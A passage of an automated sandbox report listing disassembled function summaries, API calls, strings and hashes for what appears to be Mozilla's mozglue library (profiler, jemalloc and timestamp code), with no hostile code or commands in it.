                                                                                                                                                        • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                                                                                                                        • API String ID: 1341148965-1186885292
                                                                                                                                                        • Opcode ID: 3cf248147a46f4d608927e8f997b8a4982386d01aa3458f91a5d8c0525475440
                                                                                                                                                        • Instruction ID: 1c9b475443dafa0f702fe50809646d4cf3e3ab97d2c2b935ef2d1ad405b72fc4
                                                                                                                                                        • Opcode Fuzzy Hash: 3cf248147a46f4d608927e8f997b8a4982386d01aa3458f91a5d8c0525475440
                                                                                                                                                        • Instruction Fuzzy Hash: 5AA1F631B002049FDB189F68E884B6A7FEEFF86314F104469ED1A87341DB7AE845CB61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6B084196
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6B0841F1
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6B084223
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6B08422A
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6B084231
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6B084238
                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6B084245
                                                                                                                                                        • LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6B084263
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6B08427A
                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 6B084299
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000114), ref: 6B0842C4
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6B0842F6
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6B084302
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6B084309
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6B084310
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6B084317
                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6B084324
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
                                                                                                                                                        • String ID: SetProcessDpiAwareness$Shcore.dll
                                                                                                                                                        • API String ID: 3038791930-999387375
                                                                                                                                                        • Opcode ID: 04e72946390a67e398569b4272979b29dc2e442c21f9d9fd83f96b64e0f3f51f
                                                                                                                                                        • Instruction ID: c00c226b0a489882a1d048f63176d7bead5d01f988bf619445a299dc4b0aad30
                                                                                                                                                        • Opcode Fuzzy Hash: 04e72946390a67e398569b4272979b29dc2e442c21f9d9fd83f96b64e0f3f51f
                                                                                                                                                        • Instruction Fuzzy Hash: C151E271A442247BEF186B749C49FAEBFADEF86B50F014518F9059B1C0DB78DE40CAA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FE804), ref: 6B0AD047
                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6B0AD093
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6B0AD0A6
                                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6B0FE810,00000040), ref: 6B0AD0D0
                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6B0FE7B8,00001388), ref: 6B0AD147
                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6B0FE744,00001388), ref: 6B0AD162
                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6B0FE784,00001388), ref: 6B0AD18D
                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6B0FE7DC,00001388), ref: 6B0AD1B1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
                                                                                                                                                        • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
                                                                                                                                                        • API String ID: 2957312145-326518326
                                                                                                                                                        • Opcode ID: 1bab59ac049070ac9994067d192ff74a973ecc0749bd1c97355f1a33a3af7459
                                                                                                                                                        • Instruction ID: ceef1a55ebc0c24612776b07c3164acd67edd71e9389a067b0dd6077c732406c
                                                                                                                                                        • Opcode Fuzzy Hash: 1bab59ac049070ac9994067d192ff74a973ecc0749bd1c97355f1a33a3af7459
                                                                                                                                                        • Instruction Fuzzy Hash: 2381F370B90300ABEF189FA8E954B697FEEFB56700F104A29EE0597381D779D406CB52
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BFADC
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BFAE9
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BFB31
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BFB43
                                                                                                                                                        • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6B0BFBF6
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BFC50
                                                                                                                                                        Strings
                                                                                                                                                        • [D %d/%d] profiler_unregister_thread: %s, xrefs: 6B0BFC94
                                                                                                                                                        • [I %d/%d] profiler_unregister_thread() - thread %llu already unregistered, xrefs: 6B0BFD15
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentThread$D@std@@ExclusiveLockMarkerTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Marker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfileProfilerReleaseStringView@
                                                                                                                                                        • String ID: [D %d/%d] profiler_unregister_thread: %s$[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered
                                                                                                                                                        • API String ID: 2101194506-3679350629
                                                                                                                                                        • Opcode ID: fffff4a4dfc8fea39d83ba0362bf7a70020def8516ab0fc4d7aa7adcbca02b2c
                                                                                                                                                        • Instruction ID: 63c0d945c9514c76e550a97aef00745acba72b80edd2bcf9a38d847c88e9389d
                                                                                                                                                        • Opcode Fuzzy Hash: fffff4a4dfc8fea39d83ba0362bf7a70020def8516ab0fc4d7aa7adcbca02b2c
                                                                                                                                                        • Instruction Fuzzy Hash: E371D078A04700CFD718DF28D545B6ABFE9FF86304F01456AED4687352EB3AA845CB52
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FE768,?,00003000,00000004), ref: 6B073AC5
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FE768,?,00003000,00000004), ref: 6B073AE5
                                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,00003000,00000004), ref: 6B073AFB
                                                                                                                                                        • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6B073B57
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FE784), ref: 6B073B81
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FE784), ref: 6B073BA3
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FE7B8), ref: 6B073BAE
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FE7B8), ref: 6B073C74
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FE784), ref: 6B073C8B
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FE784), ref: 6B073C9F
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FE7B8), ref: 6B073D5C
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FE784), ref: 6B073D67
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FE784), ref: 6B073D8A
                                                                                                                                                          • Part of subcall function 6B0B0D60: VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6B073DEF), ref: 6B0B0D71
                                                                                                                                                          • Part of subcall function 6B0B0D60: VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6B073DEF), ref: 6B0B0D84
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Leave$Enter$Virtual$Free$Alloc
                                                                                                                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()
                                                                                                                                                        • API String ID: 2380290044-2272602182
                                                                                                                                                        • Opcode ID: 9108fcf0f7b4fc338c785ea92b940ce2e4eb97290e099b889f7c344e1e105ed8
                                                                                                                                                        • Instruction ID: 4467b5cebbb07a7128d04b4d9987de16f356a774b8c26a88c9d116922a789678
                                                                                                                                                        • Opcode Fuzzy Hash: 9108fcf0f7b4fc338c785ea92b940ce2e4eb97290e099b889f7c344e1e105ed8
                                                                                                                                                        • Instruction Fuzzy Hash: 6B91A2717003058BEF2CDF68D8C5B1EBFE6BB89350B148178E9169B285D779D802CB95
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6B081213
                                                                                                                                                        • toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6B081285
                                                                                                                                                        • memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6B0812B9
                                                                                                                                                        • memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6B081327
                                                                                                                                                        Strings
                                                                                                                                                        • CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6B08131B
                                                                                                                                                        • MZx, xrefs: 6B0811E1
                                                                                                                                                        • Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6B08120D
                                                                                                                                                        • &, xrefs: 6B08126B
                                                                                                                                                        • TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6B0812AD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$toupper
                                                                                                                                                        • String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
                                                                                                                                                        • API String ID: 403083179-3658087426
                                                                                                                                                        • Opcode ID: 5db9bb87904c6433894ddd187ce7e90db71f768db0f92c69d9dbc5d04d5eac9c
                                                                                                                                                        • Instruction ID: 048322b1b794386daf54122b9bf56273626df0cb7918d9dccab17c25a9e4b325
                                                                                                                                                        • Opcode Fuzzy Hash: 5db9bb87904c6433894ddd187ce7e90db71f768db0f92c69d9dbc5d04d5eac9c
                                                                                                                                                        • Instruction Fuzzy Hash: 3E719271E043688ADF189F74D8007DEBFF5BF59309F04059AD559A3240D738AB85CBA2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6B073217
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6B073236
                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6B07324B
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6B073260
                                                                                                                                                        • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6B07327F
                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6B07328E
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6B0732AB
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6B0732D1
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6B0732E5
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6B0732F7
                                                                                                                                                          • Part of subcall function 6B0AAB89: EnterCriticalSection.KERNEL32(6B0FE370,?,?,?,6B0734DE,6B0FF6CC,?,?,?,?,?,?,?,6B073284), ref: 6B0AAB94
                                                                                                                                                          • Part of subcall function 6B0AAB89: LeaveCriticalSection.KERNEL32(6B0FE370,?,6B0734DE,6B0FF6CC,?,?,?,?,?,?,?,6B073284,?,?,6B0956F6), ref: 6B0AABD1
                                                                                                                                                        • __aulldiv.LIBCMT ref: 6B07346B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
                                                                                                                                                        • String ID: KernelBase.dll$QueryInterruptTime
                                                                                                                                                        • API String ID: 3006643210-2417823192
                                                                                                                                                        • Opcode ID: d6d815da9d3857b2003de03e690b7c4eb20bd4bd63285f216c8e05b7d72bf97f
                                                                                                                                                        • Instruction ID: 15aabc2ce3d35b83646313602463cd53f92e8797e63895ea001051d0ac2dabdd
                                                                                                                                                        • Opcode Fuzzy Hash: d6d815da9d3857b2003de03e690b7c4eb20bd4bd63285f216c8e05b7d72bf97f
                                                                                                                                                        • Instruction Fuzzy Hash: 3461F2719087018BD729DF38D45171ABBE9FF8A350F20872DE8A5A3291EB34E546CB42
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0CD85F
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6B0CD86C
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6B0CD918
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0CD93C
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6B0CD948
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6B0CD970
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0CD976
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6B0CD982
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6B0CD9CF
                                                                                                                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6B0CDA2E
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0CDA6F
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6B0CDA78
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6B0CDA91
                                                                                                                                                          • Part of subcall function 6B095C50: GetTickCount64.KERNEL32 ref: 6B095D40
                                                                                                                                                          • Part of subcall function 6B095C50: EnterCriticalSection.KERNEL32(6B0FF688), ref: 6B095D67
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6B0CDAB7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1195625958-0
                                                                                                                                                        • Opcode ID: 33c3ad66d9c2eea105646895a189f969ac3a67d29a85e8e51e39c331c7547dfb
                                                                                                                                                        • Instruction ID: a273e8c2af75ebc3dca01bd1909df01be284b1f8a18d0b93b6dab05ce3534e49
                                                                                                                                                        • Opcode Fuzzy Hash: 33c3ad66d9c2eea105646895a189f969ac3a67d29a85e8e51e39c331c7547dfb
                                                                                                                                                        • Instruction Fuzzy Hash: 0E718A756043049FCB04DF28C888B5EBFE5FF89310F15866AEC5A9B211EB34E945CB92
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • AcquireSRWLockShared.KERNEL32 ref: 6B083BB4
                                                                                                                                                        • ReleaseSRWLockShared.KERNEL32 ref: 6B083BD2
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32 ref: 6B083BE5
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32 ref: 6B083C91
                                                                                                                                                        • ReleaseSRWLockShared.KERNEL32 ref: 6B083CBD
                                                                                                                                                        • moz_xmalloc.MOZGLUE ref: 6B083CF1
                                                                                                                                                          • Part of subcall function 6B08CA10: malloc.MOZGLUE(?), ref: 6B08CA26
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1881024734-0
                                                                                                                                                        • Opcode ID: 56a393717032f91ccc8f7c0daf0dacf56d32b4715511cc41c4b5915effef413b
                                                                                                                                                        • Instruction ID: 64a3e446c2ae535c7d2e4ee083ae85c4eb9d2c6b496de2b4bb01dd63c6eb4603
                                                                                                                                                        • Opcode Fuzzy Hash: 56a393717032f91ccc8f7c0daf0dacf56d32b4715511cc41c4b5915effef413b
                                                                                                                                                        • Instruction Fuzzy Hash: EFC14EB1904741CFCB28DF28D08475ABFE6BF89304F1585AEE9998B311D735E985CB82
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6B084A68), ref: 6B0B945E
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6B0B9470
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6B0B9482
                                                                                                                                                          • Part of subcall function 6B0B9420: __Init_thread_footer.LIBCMT ref: 6B0B949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BEBA4
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6B0BEBAC
                                                                                                                                                          • Part of subcall function 6B0B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6B0B94EE
                                                                                                                                                          • Part of subcall function 6B0B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6B0B9508
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BEBC1
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FF4B8,?,?,00000000), ref: 6B0BEBCE
                                                                                                                                                        • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6B0BEBE5
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8,00000000), ref: 6B0BEC37
                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6B0BEC46
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6B0BEC55
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6B0BEC5C
                                                                                                                                                        Strings
                                                                                                                                                        • [I %d/%d] profiler_start, xrefs: 6B0BEBB4
                                                                                                                                                        • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6B0BEA9B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: getenv$CurrentExclusiveLockThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectReleaseSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                        • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                                                                                                                        • API String ID: 4250961200-1186885292
                                                                                                                                                        • Opcode ID: 71a867fdf2c0f3295c08b5171a9f6bba586829a97c6899b67e053afbce709fbd
                                                                                                                                                        • Instruction ID: 68d28294136a0e84cea3e11b13319ee3cda5cc91ab0a0a4a168c2919e7a06209
                                                                                                                                                        • Opcode Fuzzy Hash: 71a867fdf2c0f3295c08b5171a9f6bba586829a97c6899b67e053afbce709fbd
                                                                                                                                                        • Instruction Fuzzy Hash: 3111AF75A001149BCF049F74E849B5A7FADEF46369F004261FE1A97241D73AE806CBA2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6B0AD9DB), ref: 6B0AF2D2
                                                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6B0AF2F5
